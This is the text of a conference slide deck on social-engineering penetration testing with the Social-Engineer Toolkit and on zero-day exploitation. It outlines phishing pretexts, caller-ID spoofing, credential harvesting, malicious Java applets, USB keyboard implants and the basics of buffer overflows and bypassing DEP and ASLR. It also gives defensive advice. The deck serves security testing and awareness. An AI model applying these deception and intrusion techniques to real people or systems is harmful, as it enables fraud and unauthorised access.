Social-Engineering Hacking your perimeter….

Not everyone needs to use zero days…

David Kennedy (ReL1K)

http://www.secmaniac.com Twitter: Dave_ReL1K

About the speaker

•  Wrote the Social-Engineer Toolkit (SET), Member of the Social-Engineer.org podcast, contributor to Back|Track, Metasploit, etc.

•  Director of Information Security for a Fortune 1000

•  Penetration testing and exploit focus

•  Worked for the US Marines, VP/Partner of a information security consulting firm.

q Overview of perimeter security q Main attack vectors utilized to compromise the

perimeter q Walkthrough of each attack vector q Recommendations and conclusions

Agenda

3

q Security is getting better. Harder to find traditional vanilla attack vectors

q Hackers adapt and overcome controls and technology

put in place q We’ll talk about social-engineering and the zero-day

angle but there’s still a ton of companies out there that do horrible when = to security.

Overview

4

q Traditional attack methods don’t work

q You’ve undergone several dozen penetration tests and vulnerability scans

q You have a security team and a functioning security program

q You have anti-virus, HIPS, IPS, IDS, heuristics, and behavioral detection and prevention capabilities.

Hacking your Perimeter

5

q Social-Engineering and Physical attack vectors – Probably our most preferred

q Zero-Day Angle – Crafting an exploit from your target

Perimeter Hacking Options

6

Social-Engineering and Security

•  Why fight your:

•  SIEM •  Anti-Virus •  HIPS/NIPS/IPS/IDS •  Web Application Firewall •  Secure Coding Practices •  Patch Management Why fight everything you’ve built your entire security program

on?

It’s increasingly harder to break in on the external perimeter, adaptation occurs towards our weakest link,

the human element.

The easiest way in

•  It usually takes me a week of steady fuzzing and

reversing to find a zero-day and craft a reliable exploit.

•  It takes me a day to get access to the internal network from social-engineering.

It’s not just us doing this…

•  The security community revolves around real world

attacks.

•  We are protecting against attacks out in the wild, hackers use social-engineering on a regular basis.

•  State-sponsored attacks are the largest threat out there today. A country that has 10,000 people dedicated to hacking can’t be good..

q Big increase in targeted attacks against organizations in an effort to steal intellectual property and financial motivations.

q Focused attacks that utilize specialized attacks

are difficult to protect against.

State-Sponsored Attacks

11

Which country is the worst?

•  Well… Working with government agencies I really cant

say…

Completely unrelated slide

Why should they care?

•  No repercussions (except from Google), almost

untraceable, and cheap.

•  Why build a new industry when you can take it?

Couple SE favorites

•  Pretexting is your hack. What your going to do during

your social-engineer attack.

•  Nuero Linguistic Programming (NLP) – How we think as humans

Steps of Anchoring •  Establish an Anchoring - This is triggering the stimuli

that will be your ultimate Anchor. For example talking frantic, and in need of help.

•  Firing your Anchor (also known as Activating) – You’ve triggered a feeling in the victim, you need help. Now you ask for that help.

So why use SE? •  We’re lazy, we go for the easiest route.

Basics of SET

•  Open-Source purely Python driven.

•  SET utilizes Metasploit for both the exploit repository for client-side attacks and payloads.

•  Multiple attack vectors specifically designed for Social-Engineering.

•  Has become the standard for Social-Engineering in penetration tests across the world.

SET Attack Vectors

•  Spear-Phishing – Spoof or utilize already established email addresses to do spear-phishing attacks with fileformat attack vectors.

•  Web Attacks – Multiple attack vectors including java applet, client-side exploits, tabnabbing, man left in the middle, and the credential harvester.

•  Malicious USB/DVD/CD – Autorun creation, allows you to deploy MSF payloads in a simple autorun.

SET Attack Vectors Cont.

•  Arduino / Teensy USB HID Attack Vector – Multiple payload selection for the USB keyboard HID attacks.

Scenario 1 - USB HID Attack Vector

•  Send an employee a brand new keyboard with all of the great bells and whistles with a company letter head saying we’re doing updates to keyboards.

•  Plugs in the device, motion sensors detect if user is on the system or not. Mouse is moved 1 pixel every 3 minutes to ensure screen is not locked.

DEMO

The keyboard attack

•  Bypasses all autorun capabilities to execute arbitrary code on the system.

•  Can drop malicious binaries, trigger overflows, utilize downloaders, implant keystroke loggers, or backdoor your stuff.

•  Easily hidden in peripheral devices like docking stations, mouse, keyboard, computers, USB thumb drives, and much more…

Integrating into Existing Hardware

•  Most new keyboards have integrated USB Hubs.

Motion Sensor capabilities (thanks Garland)

Scenario 2 - Java Applet Attack

•  You perform recon on the company your targeting. You learn their lingo, they structure, harvest email addresses, you know your pretext.

•  You register a domain name similar to your victims.

•  You call up the sales department claiming to be a customer that is experiencing issues connecting to your new company site.

DEMO

Thomas Werth Attack Vector

•  Released at ShmooCon, this attack vector allows you to create a malicious Java Applet.

•  User hits “run” and the payload is executed on the victims machine.

•  Redirects user back to original site to make attack less conspicuous.

•  Heavy obfuscation of java and payload for A/V bypass and fixed major issues with Linux/OSX payload deployment. Applet source just opened today!

DEMO

Multi Attack

•  You want to build the best possible pretext and ensure that if one option fails, there are multiple redundancies within the attack to ensure success rates.

•  You call the IT Help Desk claiming to be a high-level employee that is having issues getting to a mission critical website. You spoof your source number to come from the executives phone number.

DEMO

The Multi-Attack Vector

•  As you can see, this attack vector has multiple attacks built into one website.

•  Ability to have failover in case one attack option is not successful.

•  Utilizes a combination of harvester, java applet, and client-side exploits in order to compromise the victim.

Why is it effective?

•  We are humans, we are programmed from birth through our lives to act and behave a certain way.

•  Our brains all work the same way, we are all vulnerable and there really is no patch.

So why use SET?

•  The threat is real.

•  This isn’t FUD or overhype stuff.

•  As to be incorporated into your normal penetration testing methodologies.

•  It test’s your security controls and information security awareness program and how effective you can stop these types of attacks.

q Zero days are defined as an attack vector that has not been patched or found before in the past.

q Zero days are out there, they aren’t public and they can be around for years without being released.

q Adobe has lately been getting hit it seems like almost every week with a new zero-day.

q Zero days are extremely difficult to detect or prevent against.

Zero-Days

36

q Your performing a penetration test for CompanyXYZ, you have exhausted all manual efforts and have found no viable attack method through the perimeter.

q Web applications are solid and have no apparent vulnerability.

q The ‘zero-day’ angle is your only option to gain access to the systems.

Scenario 1

37

q Brute force method to bug hunting.

q Sends random commands in hopes of a crash.

q Buffer length = 50 you send 51

An introduction into ‘Fuzzing’

38

q The example you are about to see is a basic overflow and is as easy as it gets.

q There are several different types of overflows and different ways of exploiting them.

q We’ll talk shortly about Windows protection mechanisms, in this scenario they are disabled.

Precursor

39

q SMTP server is susceptible to a stack based overflow in the “EHLO” parameter.

q By sending 6000 “\x41”’s or ASCII = ‘A’ causes a crash.

q An attacker knows that a vulnerability is here and with further research can exploit this vulnerability.

Buffer Overflow Example

40

q JMP – Jump <address> (jump to instruction)

q EIP – Instruction Pointer (return address)

q ESP – Starter Pointer (where the beginning of our stack is)

q NOP – No operand (do nothing)

q NOP Slide – Multiple NOP’s that create a slide affect

Some Basic Instructions to be aware of

41

How Windows is setup…

42

Before

43

After

44

q Data Execution Prevention – In this attack if DEP was enabled the stack would be marked read only and fail

q Stack Canaries (GS) – Random cookie values are inserted to ensure stack integrity

q Address Space Layout Randomization (ASLR) randomizes memory addresses by 2 bytes

Windows Protection Mechanisms

45

q Return-to-libc attack utilizing Return Oriented Programming (ROP). This can also defeat ASLR.

q Remember when we inserted a “JMP ESP” command? Instead we can use “gadgets” to build our attack and prep our stack to call the WriteProcessMemory function.

q This will copy our shellcode from our stack to a writable memory address (for example a kernel driver).

Defeating Data Execution Prevention (DEP) (and ALSR)

46

q Third party closed-source applications are tough. Having a mature third party application security review process is critical.

q  Internally developed software needs to undergo rigorous testing and source code analysis to ensure overflows are mitigated before reaching production.

q Have a team dedicated to the research and protection to zero-day based threats and being able to detect these types of attacks from occurring.

Protecting Against Overflows

47

q When utilizing overflows, generally a reverse connection is needed.

q Ensure tight egress filtering is in place and that servers can only connect to what is absolutely necessary on the Internet.

q Proper controls in place is OK.

Minimizing Zero-Day Damage

48

Traditional Pentests are Dead

Out of scope..

•  Businesses don’t understand what a true penetration test represents.

•  No solid framework, not all of us get to do fun stuff like this…

•  Things are taken out of scope, and there’s limited budget..

Where we need to go…

If you aren’t doing this…

•  If you aren’t doing SE as apart of your regular penetration tests you are seriously missing out.

•  If you don’t know about this, you should learn…

•  Success ratio’s for compromise with SET are estimated at around 94%.

Learning more about SE

•  http://www.social-engineer.org - Created by Chris Hadnagy (loganWHD) , great reference for Social-Engineering

Questions?

davek@social-engineer.org Twitter: Dave_ReL1K